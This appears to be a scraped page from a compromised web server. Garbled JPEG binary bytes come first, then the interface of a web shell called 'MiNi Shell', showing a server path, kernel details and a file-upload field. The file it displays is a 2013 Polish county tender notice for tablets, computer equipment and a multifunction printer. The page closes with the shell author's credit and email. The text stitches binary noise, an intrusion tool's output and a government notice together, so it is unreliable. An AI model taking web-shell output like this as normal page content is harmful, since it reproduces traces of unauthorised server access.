JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130219/69092-N-2013.html

<p class="kh_header"><b>Krotoszyn: Zadanie 1
Dostawa tabletów.
Zadanie 2  
Dostawa sprzętu komputerowego.
Zadanie 3
Dostawa urządzenia wielofunkcyjnego do kopiowania, drukowania  i skanowania.</b><br>
<b>Numer ogłoszenia: 69092 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1
Dostawa tabletów.
Zadanie 2  
Dostawa sprzętu komputerowego.
Zadanie 3
Dostawa urządzenia wielofunkcyjnego do kopiowania, drukowania  i skanowania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Dostawa tabletów.
Zadanie 2  
Dostawa sprzętu komputerowego.
Zadanie 3
Dostawa urządzenia wielofunkcyjnego do kopiowania, drukowania  i skanowania.
Zadanie 1 
      2.2           Dostawa tabletów
                 Tablety - 3 szt.
                 Szczegółowy opis przedmiotu zamówienia zawierają  załączniki Nr 1 do SIWZ
                  2.2.1. W  Załączniku Nr 1  podano minimalne parametry wymagań technicznych sprzętu 
                  2.2.2 Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza                                 możliwość     składania ofert równoważnych ale o parametrach technicznych takich                                samych lub lepszych  niż    podane.    Wykonawca składając ofertę musi przedłożyć                                informację   o   proponowanym    produkcie zawierającą  nazwę i parametry                                techniczne   proponowanego   sprzętu.
                   2.2.3   Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do                                 siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez                                 Zamawiającego.
2.2.4. Po dostarczeniu przedmiotu zamówienia do siedziby Zamawiającego,                                 Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w                                  kolejnych 3 dniach    roboczych od dnia dokonania  dostawy dokona odbioru                                  jakościowego.
2.2.5.   Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy                                 przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura                                 może być  wystawiona dopiero po           podpisaniu   protokołu odbioru                               ilościowego i  jakościowego bez zastrzeżeń.

               2.3.   Zadanie 2 
                        Dostawa sprzętu komputerowego
	            Monitory - 3 szt., drukarki laserowe - 2 szt., ekran rozwijalny elektrycznie - 1 szt.,
                        router wifi - 1 szt., , przewód d-sub - 1 szt., Przewód skrętka UTP 5e Cu 305 m  -                          1 szt., Wtyk RJ45 kat.5E linka/drut S  - 1 paczka 100szt. Uchwyt sufitowy do projektora                         multimedialnego -  1 szt. 
	     Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 2   do SIWZ
	2.3.1 W  Załączniku Nr 2 a - 2f  podano minimalne parametry wymagań technicznych                                     sprzętu
                        2.3.2 Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza                                     możliwość składania ofert równoważnych ale o parametrach technicznych takich                                    samych lub lepszych  niż  podane.    Wykonawca składając ofertę musi                                     przedłożyć    informacje  o   proponowanym            produkcie zawierającą                                      nazwę   i parametry         techniczne           proponowanego            sprzętu.
	2.3.3  Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do                                     siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez                                      Zamawiającego.
	2.3.4 Po dostarczeniu przedmiotu zamówienia do siedziby Zamawiającego,                                     Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w                                     kolejnych 3 dniach  roboczych od dnia dokonania  dostawy dokona odbioru                                     jakościowego.
	2.3.5   Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy                                     przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura  może                                     być  wystawiona dopiero po podpisaniu   protokołu odbioru ilościowego i                                     jakościowego bez zastrzeżeń.


2.4.   Zadanie 3
Dostawa urządzenia wielofunkcyjnego do kopiowania, drukowania i skanowania- 1 szt.
Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 3   do SIWZ

2.4.1  W  Załączniku Nr 3  podano minimalne parametry wymagań technicznych sprzętu
2.4.2  Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do           siedziby Zamawiającego, zamontować urządzenie w miejscu wskazanym przez           Zamawiającego (siedziba Zamawiającego) oraz uruchomić urządzenie. Urządzenie musi być            gotowe  do pracy w siedzibie Zamawiającego.
2.4.3   Wraz z przedmiotem zamówienia Wykonawca dostarczy również instrukcję obsługi urządzenia             w    języku polskim, karty gwarancyjne sprzętu oraz inne     dokumenty wydane dla             użytkownika    sprzętu.
2.4.4  Wykonawca zobowiązany jest do przeprowadzeniana na własny koszt  szkolenia pracowników Zamawiajacego w zakresie prawidłowej obsługi urzadzenia w siedzibie Zamawiającego - min. 2 godz.
2.4.5  Wykonawca udzieli gwarancji na będące przedmiotem zamówienia urządzenia na okres zgodnie            ze  złożoną ofertą (jednak nie  mniej niż okres okreslony w wymaganiach technicznych przez            Zamawiajacego)  od dnia protokolarnego odbioru przedmiotu zamówienia.. 
           W ramach gwarancji Wykonawca zapewni bezpłatne wymiany wszystkich uszkodzonych            lub zużytych części w ramach prawidłowej eksploatacji urządzenia niezbędnych do            prawidłowego  funkcjonowania urządzeń z wyłączeniem mediów (papier, kalka, folia, itp.)                 oraz  tuszy,  tonera. 
          Serwis gwarancyjny obejmie również bezpłatne regulacje urządzenia w celu otrzymania            wysokiej i stałej jakości wydruków i kopii oraz bezpłatny dojazd serwisu.
2.4.6    Pożądane jest aby serwis gwarancyjny oraz serwis pogwarancyjny świadczony   był przez            osoby  posiadające odpowiednie certyfikat   producenta potwierdzające ich kwalifikacje do             naprawy urządzenia.
2.4.7.  Urządzenie musi być fabrycznie nowe (nie starsze niż z rocznika 2012)  tzn.  nie regenerowane,           nie   instalowane  nigdy wcześniej w żadnym celu, nie obciążone    prawami osób lub              podmiotów  trzecich. 

2.4.8.  Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy i uruchomienia             sprzętu w siedzibie Zamawiającego. faktura  może być   wystawiona dopiero                po    podpisaniu   protokołu odbioru ilościowego i jakościowego bez zastrzeżeń.

2.4.9   Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza    możliwość           składania ofert równoważnych ale o parametrach technicznych takich samych lub lepszych  niż            podane.    Wykonawca składając ofertę musi przedłożyć    informację           o   proponowanym            produkcie zawierającą  nazwę i parametry         techniczne           proponowanego            sprzętu.



2.5. Po dostarczeniu przedmiotu zamówienia (Zadanie 1, 2 i 3) do siedziby Zamawiającego,              Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w kolejnych 3              dniach   roboczych od dnia dokonania  dostawy dokona odbioru jakościowego.
2.6.     Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy i uruchomienia              przedmiotu    zamówienia w siedzibie Zamawiającego. Faktura  może być               wystawiona dopiero po  podpisaniu   protokołu odbioru jakościowego bez zastrzeżeń.

2.7.   Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie          zamierza powierzyć podwykonawcom (o ile dotyczy). Wskazanie niniejszego nastąpi w          Formularzu Oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.23.13.00-0, 30.23.13.20-6, 30.23.21.10-8, 38.65.34.00-1, 30.12.13.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie  spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie  spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie  spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie  spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wg oświadczenia
na zasadzie  spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy-  wraz z wypełnionymi załącznikami 
1 i/lub 2 i/lub 3</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://powiat-krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://powiat-krotoszyn.bip.net.pl
lub
Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 
                 Dostawa tabletów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 
                 Dostawa tabletów
                 Tablety - 3 szt.
                 Szczegółowy opis przedmiotu zamówienia zawierają  załączniki Nr 1 do SIWZ
                  2.2.1. W  Załączniku Nr 1  podano minimalne parametry wymagań technicznych sprzętu 
                  2.2.2 Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza                                 możliwość     składania ofert równoważnych ale o parametrach technicznych takich                                samych lub lepszych  niż    podane.    Wykonawca składając ofertę musi przedłożyć                                informację   o   proponowanym    produkcie zawierającą  nazwę i parametry                                techniczne   proponowanego   sprzętu.
                   2.2.3   Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do                                 siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez                                 Zamawiającego.
2.2.4. Po dostarczeniu przedmiotu zamówienia do siedziby Zamawiającego,                                 Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w                                  kolejnych 3 dniach    roboczych od dnia dokonania  dostawy dokona odbioru                                  jakościowego.
2.2.5.   Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy                                 przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura                                 może być  wystawiona dopiero po           podpisaniu   protokołu odbioru                               ilościowego i  jakościowego bez zastrzeżeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 
                        Dostawa sprzętu komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 
                        Dostawa sprzętu komputerowego
	            Monitory - 3 szt., drukarki laserowe - 2 szt., ekran rozwijalny elektrycznie - 1 szt.,
                        router wifi - 1 szt., , przewód d-sub - 1 szt., Przewód skrętka UTP 5e Cu 305 m  -                          1 szt., Wtyk RJ45 kat.5E linka/drut S  -  1 paczka 100szt. Uchwyt sufitowy do                           projektora  multimedialnego -  1 szt. 
	     Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 2   do SIWZ
	2.3.1 W  Załączniku Nr 2 a - 2f  podano minimalne parametry wymagań technicznych                                     sprzętu
                        2.3.2 Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza                                     możliwość składania ofert równoważnych ale o parametrach technicznych takich                                    samych lub lepszych  niż  podane.    Wykonawca składając ofertę musi                                     przedłożyć    informacje  o   proponowanym            produkcie zawierającą                                      nazwę   i parametry         techniczne           proponowanego            sprzętu.
	2.3.3  Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do                                     siedziby Zamawiającego oraz złożyć go w miejscu wskazanym przez                                      Zamawiającego.
	2.3.4 Po dostarczeniu przedmiotu zamówienia do siedziby Zamawiającego,                                     Zamawiający dokona odbioru ilościowego sprzętu  w dniu jego dostawy, a w                                     kolejnych 3 dniach  roboczych od dnia dokonania  dostawy dokona odbioru                                     jakościowego.
	2.3.5   Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy                                     przedmiotu  zamówienia do siedziby Zamawiającego. Jednakże  faktura  może                                     być  wystawiona dopiero po podpisaniu   protokołu odbioru ilościowego i                                     jakościowego bez zastrzeżeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.23.13.00-0, 30.23.21.10-8, 38.65.34.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3
Dostawa urządzenia wielofunkcyjnego do kopiowania, drukowania i skanowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3
Dostawa urządzenia wielofunkcyjnego do kopiowania, drukowania i skanowania- 1 szt.
Szczegółowy opis przedmiotu zamówienia zawiera  załączniki Nr 3   do SIWZ

2.4.1  W  Załączniku Nr 3  podano minimalne parametry wymagań technicznych sprzętu
2.4.2  Wykonawca zobowiązany jest na własny koszt i ryzyko dostarczyć sprzęt do           siedziby Zamawiającego, zamontować urządzenie w miejscu wskazanym przez           Zamawiającego (siedziba Zamawiającego) oraz uruchomić urządzenie. Urządzenie musi być            gotowe  do pracy w siedzibie Zamawiającego.
2.4.3   Wraz z przedmiotem zamówienia Wykonawca dostarczy również instrukcję obsługi urządzenia             w    języku polskim, karty gwarancyjne sprzętu oraz inne     dokumenty wydane dla             użytkownika    sprzętu.
2.4.4  Wykonawca zobowiązany jest do przeprowadzeniana na własny koszt  szkolenia pracowników Zamawiajacego w zakresie prawidłowej obsługi urzadzenia w siedzibie Zamawiającego - min. 2 godz.
2.4.5  Wykonawca udzieli gwarancji na będące przedmiotem zamówienia urządzenia na okres zgodnie            ze  złożoną ofertą (jednak nie  mniej niż okres okreslony w wymaganiach technicznych przez            Zamawiajacego)  od dnia protokolarnego odbioru przedmiotu zamówienia.. 
           W ramach gwarancji Wykonawca zapewni bezpłatne wymiany wszystkich uszkodzonych            lub zużytych części w ramach prawidłowej eksploatacji urządzenia niezbędnych do            prawidłowego  funkcjonowania urządzeń z wyłączeniem mediów (papier, kalka, folia, itp.)                 oraz  tuszy,  tonera. 
          Serwis gwarancyjny obejmie również bezpłatne regulacje urządzenia w celu otrzymania            wysokiej i stałej jakości wydruków i kopii oraz bezpłatny dojazd serwisu.
2.4.6    Pożądane jest aby serwis gwarancyjny oraz serwis pogwarancyjny świadczony   był przez            osoby  posiadające odpowiednie certyfikat   producenta potwierdzające ich kwalifikacje do             naprawy urządzenia.
2.4.7.  Urządzenie musi być fabrycznie nowe (nie starsze niż z rocznika 2012)  tzn.  nie regenerowane,           nie   instalowane  nigdy wcześniej w żadnym celu, nie obciążone    prawami osób lub              podmiotów  trzecich. 

2.4.8.  Za dzień   terminowego  wywiązania się z umowy, przyjmuje się dzień dostawy i uruchomienia             sprzętu w siedzibie Zamawiającego. faktura  może być   wystawiona dopiero                po    podpisaniu   protokołu odbioru ilościowego i jakościowego bez zastrzeżeń.

2.4.9   Podane nazwy własne sprzętu  są przykładowe. Zamawiający dopuszcza    możliwość           składania ofert równoważnych ale o parametrach technicznych takich samych lub lepszych  niż            podane.    Wykonawca składając ofertę musi przedłożyć    informację           o   proponowanym            produkcie zawierającą  nazwę i parametry         techniczne           proponowanego            sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.13.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com